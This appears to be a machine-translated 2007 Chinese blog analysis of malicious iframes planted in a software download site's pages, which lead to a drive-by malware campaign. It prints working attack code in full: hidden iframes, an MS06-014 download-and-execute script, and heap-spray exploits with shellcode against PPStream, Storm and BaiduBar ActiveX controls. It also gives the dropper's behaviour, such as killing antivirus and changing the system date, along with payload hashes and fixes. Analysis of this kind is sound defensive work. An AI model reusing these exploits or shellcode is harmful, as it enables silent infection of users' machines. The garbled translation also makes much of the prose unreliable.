Sky software Station is hung it and Monyer analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62200717160
Type myhack58
Reporter 佚名
Modified 2007-10-07T00:00:00


Sky software Station is one of the largest software download station one, and now it is hanging horse, then presumably there are already thousands of people caught. Monyer is not alarmist, the following analysis will prove this is not a joke.

Today occasionally the sky to see my UDisk(important reminders, the sky has a virus do not open, dizzy!), the Found Maxthon actually pop-up the program to run the warning that I'm in the c drive under c. exe file to run, don't know other people encounter this situation how to think, anyway, from my computer appear on became a terrorist thing. Looked at the task Manager, the memory has increased by a few megabytes, it is obviously being overrun. Then look at the C drive root directory, A c. exe file is lying there(this description of the virus file also not running, if running, you can't see anything.)。 So they started following the paging of the horse tour.


By the sky station's analysis, is hung it to the page only exists in the software download page. Then by adding the javascript and iframe of exclusion, and finally settles is the insertion of malicious code is:

<iframe name=import_frame width=1 height=1 src=http://iplog. skycn. com/wherefrom. php? id=3 2 3 3 6 frameborder=no></iframe>

It will be the frame width and height set to 1 pixel i.e. to the naked eye is not visible. Download whereform. php file found inside there is another code:

<iframe src=http://www. ip17173. cn/index. html? 4 1 9 8 9 1 5 0 9 width=1 0 0 height=0></iframe>

Yet another framework, direct access will see two counters, quite interesting


Continue to download ip17173. cn this site on the index. the html file is opened, inside is a bunch of encrypted javascript code, which is a good thing--the thief to steal something are usually put face Simon.


A simple look a bit, although the js is encrypted beyond recognition, but fortunately the decryption function, then everything becomes simple, the document. write into the alert. 运行 一下 index.html that POPs up the second alert window is Trojan.


9 is an iframe, to view should correspond to 9 different Trojans Oh. With flashget together download, 发现有效的仅是vip1.htm~vip4. htm this four page, estimate the remaining is reserved out of it.

This four page turn to do the code analysis from some cold sweats. The following is the analysis of the results

! MS-0 6 0 1 4 down.exe c:\1.exe

<script>url2="";url1="";try{var ado=(document. createElement("object"));ado. setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var xml=ado. CreateObject("Microsoft.XML"+"HTTP","");var as=ado. createobject("Adodb. Stream","");xml. Open("GET",url1,0);xml. Send();as. type=1;as. open();as. write(xml. responseBody);path1="..//ntuser.js";as. savetofile(path1,2);as. close();xml. Open("GET",url2,0);xml. Send();as. type=1;as. open();as. write(xml. responseBody);path2="C:\\1.exe";as. savetofile(path2,2);as. close();var shell=ado. createobject("Shell. Application","");shell. shellExecute(path1,"","","open",0);}catch(e){};</script><body>check no this page<html> ppstream down.exe c:\c.exe

<html><body><object id="pingfan" classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object><script>var shellcode = unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70% u8BAD%u0868%u8B51%u3C75%u748B%u782E%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u59AB%uBCE2%u0F8B%uF980%u7463%u570A%uD0FF%uAF95%u6AAF%uEB01%u52AC%u5752%u8F8D%u10DB%u0040%uE981%u104E%u0040%u5251%uD0FF%u016A%uFF57%uEC57%u57FF%u90E8%u7468% u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");bigblock = unescape("%u9090");headersize = 2 0;slackspace = headersize + shellcode. length;while ( bigblock. length < slackspace ) bigblock += bigblock;fillblock = bigblock. substring(0, slackspace);block = bigblock. substring(0, bigblock. length - slackspace);while(block. length + slackspace < 0x40000) block = block + block + fillblock;memory = new Array ();;;; memory;for (x=0; x< 4 0 0; x++) memory[x] = block + shellcode;var buffer = '\x0a';while (buffer. length < 5 0 0) buffer += '\x0a\x0a\x0a\x0a';pingfan. Logo = buffer;</script></body></html> storm down.exe c:\u.exe

<html> <object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object> <body> <SCRIPT language="javascript"> var shellcode = unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E% u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365% u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578"); </script> <SCRIPT language="javascript"> var bigblock = unescape("%u9090%u9090"); var headersize = 2 0; var slackspace = headersize+shellcode. length; while (bigblock. length<slackspace) bigblock+=bigblock; fillblock = bigblock. substring(0, slackspace); block = bigblock. substring(0, bigblock. length-slackspace); while(block. length+slackspace < 0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<3 0 0; x++) memory[x] = block + shellcode; var buffer = "; while (buffer. length < 4 0 5 7) buffer+='\x0a\x0a\x0a\x0a'; buffer+='\x0a'; buffer+='\x0a'; buffer+='\x0a'; buffer+='\x0a\x0a\x0a\x0a'; buffer+='\x0a\x0a\x0a\x0a'; target. rawParse(buffer); </script> </body> </html> BaiDuBar calc. cab down.exe

<script> function DowndloadCalcAndRun() { com. DloadDS("", "down.exe the", 0 0); } </script> </head> <OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0 4 2 6-454F-8 0 1 3-C41E3596E9E9}"> </OBJECT> <script> DowndloadCalcAndRun() </script> <body>welcome<html>

4 overflow vulnerability, in the former days there 3 one is 0day it!

A is ms-0 6 0 1 4 vulnerabilities, their site's down. exe file saved to c:\1. exe and run

A is ppstream stack overflow, the same file is saved to c:\c. exe and run

One is a storm overflow vulnerability, Save to c:\u. exe and run

One is baidubar overflow vulnerability, the calc. cab Save to down. exe and run

The file run after the self-delete, and then close the antivirus software, and automatically to download other Trojan or virus.)

Wherein ppstream until now still no official patch.

down. exe file a see the name will know is a download, download down uploaded to virscan. org can't help but also sweat and then a


AVG, Kaspersky, Jiang people rising Kingsoft three pillars, Norton, trend, all green light. Even if the Panda to a suspicious file, but also just because it is fsg 2.0 shell and reported a suspicious file, it means it is not actively remove. Wheat coffee although given a pws, but it is only a low risk level. So almost all the common on the market antivirus all“strike”.

down. exe will download 2 1 File. - 20.exe and down.exe Are saved to C:\Program Files\Internet Explorer\1.exe - 20.exe and down.exe run Will also perform cmd /c taskkill /im 360safe.exe /f cmd /c date 2000-01-01

And then there's a delete own batch.

There are other such as into the startup items, change the name or something.

Thanks for the Ghost boy to provide information!

Second download the 1 6 virus file is(also worth noting is the antivir red umbrella to include down. exe, 1 6 virus all pass to kill, and it is a free antivirus that may be part of the system antivirus compatible) to:

1.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:D92BF450DA49DB121009F94E1321EDF4

2.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:E6D8CCC8AD8BBEB18652D432BF4A13BA

3.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:362D6904DE8D8111E1BD20BA5320E7FA

4.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:23DF9595AA8F10EB8AC850A5ACFAB791

6.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:FEACB467E170BAD60ECB209106402228

7.exe Win32. PSWTroj. OnLineGames. dz. 1 6 3 8 4 0 nSPack 2.1 - 2.5 -> the North Star/Liu Xing Ping [Overlay] md5:7BD941FA726E9CFB30A68F7768080B04

8.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:BD618C1C29BC1C7CB69AEA2BA49D7C45

9.exe suspicious file Upack 0.3.9 beta2s -> Dwing md5:6DC4A1336F4B0557EAFE3E3247F3C6FD

10.exe tr/dropper. gen Microsoft Visual C++ v6. 0 DLL * md5:50DF0549331035B6159DD7F2BD3947A6

11.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:A33527DAE1C4C541609D4FECFF63A0C9

13.exe tr/dropper. gen UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo md5:39CC71D365556C92EEF065169ED75148

15.exe suspicious file Upack 0.3.9 beta2s -> Dwing [Overlay] md5:1E96067D3C6A25BFF59AD76C03C2A565

16.exe suspicious file Upack 0.3.9 beta2s -> Dwing md5:73E0B9D28014C84675BEF3343409EDB2

17.exe Win32. PSWTroj. OnLineGames. dz. 1 6 3 8 4 0 nSPack 2.1 - 2.5 -> the North Star/Liu Xing Ping [Overlay] md5:477927E9679924CEFCF8BD95DF2BA71D

18.exe Win32. PSWTroj. OnLineGames. dz. 1 6 3 8 4 0 nSPack 2.1 - 2.5 -> the North Star/Liu Xing Ping [Overlay] md5:A2C87EE4059B2145DCA8CC7CF9692329

5.exe cannot down 12.exe cannot down 14.exe cannot down 19.exe cannot down 20.exe cannot down

For more than four overflow, Monyer solution is as follows:

Download the patch to fix ms06014 vulnerability, baidubar and storm upgrade

While the pps trouble some-delete the registry clasid: {and 20C2C286-BDE8-441B-B73D-AFA22D914DA5}and{5EC7C511-CD0F-42E6-830C-1BD9882F3458}until given the official approach.

As for the sky, and other official out the Bulletin again on the right, be careful of wet shoes! So much of the site being invaded once also not easy!

Last look at the horses of the relevant documents, quite spectacular.


Monyer! 2007-10-04 0 2:3 5